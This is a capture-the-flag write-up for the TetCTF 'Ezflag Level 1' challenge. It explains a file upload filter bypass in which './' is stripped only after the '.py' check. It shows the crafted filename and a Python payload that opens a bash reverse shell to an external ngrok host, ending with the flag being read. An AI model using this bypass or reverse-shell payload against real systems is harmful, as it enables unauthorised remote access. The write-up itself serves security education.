Links

Ezflag Level 1

This was a file upload vulnerability. Looking inside the lighttpd.conf file, we could see that any .py files are run with /usr/bin/python3.
alias.url += ( "/cgi-bin" => "/var/www/cgi-bin" )
alias.url += ( "/uploads" => "/var/www/upload" )
cgi.assign = ( ".py" => "/usr/bin/python3" )
Validation is performed to check for the .py extension.
def valid_file_name(name) -> bool:
if len(name) == 0 or name[0] == '/':
return False
if '..' in name:
return False
if '.py' in name:
return False
return True
However, once validated, a replacement of ./ with an empty string is performed.
normalized_name = item.filename.strip().replace('./', '')
Thus, we can bypass the .py filter by using ./py.
Content-Disposition: form-data; name="file"; filename="socengexp.p./y"
Content-Type: text/x-python-script
​
import os
​
os.system('bash -c "bash -i >& /dev/tcp/2.tcp.ngrok.io/15273 0>&1"')
This allows us to get a reverse shell.
[email protected]:/$ cat flag
cat flag
TetCTF{65e95f4eacc1fe7010616e051f1c610a}